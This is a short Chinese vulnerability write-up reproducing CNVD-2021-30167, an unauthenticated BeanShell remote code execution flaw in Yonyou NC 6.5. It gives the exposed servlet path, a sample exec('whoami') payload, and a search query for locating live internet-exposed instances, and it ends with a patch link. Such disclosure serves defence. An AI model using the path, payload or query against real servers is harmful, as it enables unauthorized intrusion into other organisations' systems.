CNVD-2021-30167：用友NC BeanShell RCE复现

作者：蚂蚁@Timeline Sec

本文字数：361

阅读时长：2～3min

声明：请勿用作违法用途，否则后果自负

0x01 简介

用友NC是面向集团企业的管理软件，其在同类市场占有率中达到亚太第一。

0x02 漏洞概述

用友NC由于对外开放了BeanShell接口，攻击者可以在未授权的情况下直接访问该接口，并构造恶意数据执行任意代码从而获取服务器权限。

0x03 影响版本

用友NC6.5版本

0x04 环境搭建

国外在线环境

title=="YONYOU NC" && country="SG"

0x05 漏洞复现

1、访问

/servlet/~ic/bsh.servlet.BshServlet

得到如图：

2、我们发现这里有执行代码的接口我们输入payload如：exec("whoami");即可看到命令执行成功

0x06 修复方式

该漏洞为第三方jar包漏洞导致，用友NC官方已发布安全补丁，建议使用该产品的用户及时安装该漏洞补丁包。

补丁下载链接：

http://umc.yonyou.com/ump/querypatchdetailedmng? PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19